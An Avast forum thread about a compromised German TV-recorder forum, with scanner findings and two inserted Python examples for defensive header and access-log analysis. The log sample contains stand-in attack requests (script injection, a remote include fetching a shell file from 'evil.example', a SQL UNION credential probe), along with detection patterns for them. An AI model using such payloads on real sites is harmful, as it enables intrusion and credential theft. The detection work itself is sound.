Author Topic: Heavily infected site which is not blocked by Avast  (Read 6884 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Heavily infected site which is not blocked by Avast
« Reply #15 on: October 09, 2013, 12:50:44 AM »
One of the System Attendant's tasks is being blocked.
This can be caused by a variety of problems.
Check for other alerts that will provide a clearer idea of the problem,
such as failures in Mail Flow or MAPI logon or failure of database maintenance to run.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline mchain

  • Avast Evangelist
  • Ultra Poster
  • ***
  • Posts: 5719
  • Spartan Warrior
Re: Heavily infected site which is not blocked by Avast
« Reply #16 on: October 10, 2013, 10:48:32 PM »
Seems some progress is being made at this site:
http://urlquery.net/report.php?id=6574369
http://zulu.zscaler.com/submission/show/db1b0a88ea586dd860afd12643412b88-1381436626

Also an apparent redirect put in place by the site admins here:  http://www.onlinetvrecorder.com/v2/?go=forumwarning  German version only.  Use Google Translate for English or other languages.

Multiple blacklisted sites on this one IP address alone:  http://www.urlvoid.com/ip/217.70.184.38
Windows 11 Home 23H2
Windows 11 Pro 23H2
Avast Premier Security version 24.8.6127 (build 24.8.9372.868)
UI version 1.0.814

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Heavily infected site which is not blocked by Avast
« Reply #17 on: October 10, 2013, 11:45:05 PM »
Well, there is still excessive information being spread from the site. System Details:
Running on: Varnish
Powered by: PHP/5.3.2-1ubuntu4.18
Via proxy: 1.1
/ad.adnet.de/adc.php?s=23643;wxh=728x90 - for further links (broken links and redirects) see: http://www.ranks.nl/cgi-bin/ranksnl/tools/checklink.cgi?uri=www.otrforum.com
The only scanner to flag this site as suspicious among the major website scanners is Comodo SiteInspector on VT, but the actual scan is all green now:
http://app.webinspector.com/public/reports/17728037
Quttera still flags the conditional redirect: index
Severity: Suspicious
Reason: Detected suspicious redirection to external web resources at HTTP level.
Details: Detected HTTP redirection to http://www.onlinetvrecorder.com/v2/?go=forumwarning.
File size[byte]: 4294967295
File type: Unknown
MD5: 00000000000000000000000000000000
Scan duration[sec]: 0.001000

This suspicious file flag denotes, mchain, that they are "not out of the woods" yet at that site, well, I mean security-wise...
This file is being flagged by Quttera because it is found as a top-level document at HTTP level, and as such this is a very dangerous practice,
because that way it grants the script the maximum permissions allowed to control the web page in the browser (by malcreants).
This insecurity could lead to serious security and privacy breaches!

polonus
« Last Edit: October 11, 2013, 12:44:38 AM by polonus »
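The header and redirect details polonus lists above are the kind of thing a site operator can check without a third-party scanner. Below is an added example (written for this edit; it is not Quttera's, Avast's or the forum's code) that walks a set of constructed HTTP responses, modelled on the headers quoted in the post, and flags version-disclosing headers, proxy hops and HTTP-level redirects to an external host. The response data is constructed inline; comparing hosts by stripping a leading "www." is a simplifying assumption, not how a production checker should do it.

```python
import re
from urllib.parse import urlsplit

# Constructed sample responses (not captured from the real site), modelled on the
# details quoted in the post: a Varnish front end, an X-Powered-By header that
# leaks the PHP version, a Via header, and a 302 to a different host.
SAMPLE_RESPONSES = {
    "http://www.otrforum.com/": (
        302,
        {
            "Server": "Varnish",
            "X-Powered-By": "PHP/5.3.2-1ubuntu4.18",
            "Via": "1.1 varnish",
            "Location": "http://www.onlinetvrecorder.com/v2/?go=forumwarning",
        },
    ),
    "http://www.example.test/login": (
        301,
        {"Server": "nginx", "Location": "https://www.example.test/login"},
    ),
    "http://www.example.test/": (200, {"Server": "nginx"}),
}

# Headers that commonly disclose the software stack. A version string is reported
# separately from a bare product name because the version is what lets an attacker
# match the host against known CVEs.
DISCLOSING_HEADERS = ("Server", "X-Powered-By", "X-AspNet-Version")
VERSION_RE = re.compile(r"\d+\.\d+(\.\d+)?")


def header(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def registrable_host(url):
    """Lowercased host with a leading 'www.' removed.
    Assumption: good enough for this demo; real code should use a public-suffix list."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def analyze_response(url, status, headers):
    """Return a list of finding strings for one response."""
    findings = []
    for name in DISCLOSING_HEADERS:
        value = header(headers, name)
        if value is None:
            continue
        kind = "version disclosure" if VERSION_RE.search(value) else "software disclosure"
        findings.append(f"{kind}: {name}: {value}")

    via = header(headers, "Via")
    if via is not None:
        # Via reveals that a proxy/cache sits in front and which HTTP version it speaks.
        findings.append(f"proxy hop disclosure: Via: {via}")

    location = header(headers, "Location")
    if 300 <= status < 400 and location:
        # A redirect at HTTP level to another host is exactly what the scanner flagged.
        if registrable_host(location) != registrable_host(url):
            findings.append(f"external HTTP redirect: {status} -> {location}")
        else:
            findings.append(f"same-site HTTP redirect: {status} -> {location}")
    return findings


def analyze_all(responses):
    """Map each URL to its findings."""
    return {url: analyze_response(url, status, hdrs) for url, (status, hdrs) in responses.items()}


if __name__ == "__main__":
    for url, findings in analyze_all(SAMPLE_RESPONSES).items():
        print(url)
        for finding in findings or ["no findings"]:
            print("  -", finding)
```

A same-site redirect (e.g. HTTP to HTTPS) is reported but is normal; the external one is the case worth a closer look, because it is also the shape a compromised host uses to send visitors elsewhere.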

Offline mchain

  • Avast Evangelist
  • Ultra Poster
  • ***
  • Posts: 5719
  • Spartan Warrior
Re: Heavily infected site which is not blocked by Avast
« Reply #18 on: October 11, 2013, 12:20:58 AM »
Pol,

Never said 'out of the woods'.   ;)    This sort of mess is going to take a while to clean up.

As you say, it seems their situation is due to lax or simply bad security practices, and so it was a relatively easy target for a hacker (or hackers).  That this is so bad that we're talking privacy and security breaches in one breath is really a shame, as the common user really does not think about these issues before they visit.

It is only a matter of time before lax policy enforcement comes back to bite you!

Some sysadmins do not know what they are doing, and they (may) never will.  Hard lesson to learn; this is always bad for innocent site visitors.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Heavily infected site which is not blocked by Avast
« Reply #19 on: October 11, 2013, 12:40:17 AM »
Yep, mchain, fully agree there.

That is why I cannot understand that some criticize Quttera and say they won't trust its scans (even here in the forums).
That is totally wrong and proof that they do not understand what a gold mine the Quttera scan results can be for the security-apt website admin
who knows about bad and/or insecure coding practices like modifiers, scripts in top-level documents over HTTP, unchecked eval() for dynamic content, etc.

I worked myself through all the appropriate SANS Reading Room PDF documents on the subject; for instance, the "Innocent Code" one is a must-read. I then wrote all relevant info down for myself in one of my notebooks, as that is the way for me at least to get familiar with these malcode hiccups and learn them by heart, so as to spot them at once as they come by. So my forehead starts to wrinkle now at every |%3C I come across. Otherwise my Malware Script Detector extension will alarm when I feed part of some malcode into my search engine of choice.

But not knowing a thing about all this and keeping up websites that come to grossly endanger innocent and unaware users could actually be considered as putting the data of website visitors at risk.

Good that avast! provides us with the Shields, and the detection rate goes up and up.

polonus


P.S. Seems there is some insight coming at the site, as they take this seriously. Good, that is why we do it. They advise users not to visit the site while
they are trying to solve the problems. The message is in German; translated, it goes like this:

Quote
Dear user of the OTR Forum (www.otrforum.com),

There are currently technical problems, so at the moment we can only offer you the support chat for exchanging experiences.
We hope that we can solve the problem within this week.

Damian
« Last Edit: October 11, 2013, 01:01:38 AM by polonus »
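polonus's reflex at every |%3C (the percent-encoded "<") is a pattern check that can be automated over a site's own access logs. The following added example (written for this edit; it is not the Malware Script Detector extension, Quttera or any Avast tool) percent-decodes the request target of each constructed Apache-style log line, including double-encoded ones, and reports which indicator families match. The log lines and the indicator list are constructed for illustration; the regexes are deliberately simple and will produce false positives on real traffic.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not taken from the real site).
# Line 2 is a plainly encoded script tag, line 3 is double-encoded (%25 -> %),
# line 4 is a remote file include with a trailing NUL, line 5 is a SQL UNION probe.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2013:00:40:17 +0200] "GET /index.php?page=home HTTP/1.1" 200 5123
203.0.113.9 - - [11/Oct/2013:00:41:02 +0200] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 812
203.0.113.9 - - [11/Oct/2013:00:41:30 +0200] "GET /search.php?q=%253Cscript%253Esrc%253D HTTP/1.1" 200 812
203.0.113.12 - - [11/Oct/2013:00:42:11 +0200] "GET /page.php?tpl=http://evil.example/shell.txt%00 HTTP/1.1" 200 77
203.0.113.7 - - [11/Oct/2013:00:43:00 +0200] "GET /view.php?id=1%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 3021
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicator families, checked against the decoded target. Order determines report order.
INDICATORS = [
    ("html-tag", re.compile(r"<\s*/?\s*script\b|<\s*iframe\b|\bon\w+\s*=", re.I)),
    ("js-eval", re.compile(r"\beval\s*\(|document\.write\s*\(|unescape\s*\(", re.I)),
    ("sql-union", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("remote-include", re.compile(r"=\s*(https?|ftp)://", re.I)),
    ("null-byte", re.compile(r"%00|\x00")),
]


def decode_layers(s, max_rounds=3):
    """Percent-decode repeatedly until the string stops changing.
    Returns (decoded, rounds); rounds > 1 means the attacker double-encoded."""
    out, rounds = s, 0
    while rounds < max_rounds:
        nxt = unquote(out)
        if nxt == out:
            break
        out, rounds = nxt, rounds + 1
    return out, rounds


def scan_request(target):
    """Decode one request target and list the indicator families it matches."""
    decoded, rounds = decode_layers(target)
    # Check both forms so a raw %00 and a decoded NUL are caught alike.
    hits = [name for name, rx in INDICATORS if rx.search(decoded) or rx.search(target)]
    return {"target": target, "decoded": decoded, "encoding_layers": rounds, "indicators": hits}


def scan_log(text):
    """Return one result dict per log line that matched at least one indicator."""
    results = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        result = scan_request(m.group("target"))
        if result["indicators"]:
            results.append(result)
    return results


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(f"{r['indicators']} layers={r['encoding_layers']} {r['decoded']}")
```

The decode loop is the part that matters: a scanner that only looks at the raw URL misses %253C, which a PHP front end that decodes twice (for example via a second urldecode() on user input) would happily turn into a live "<".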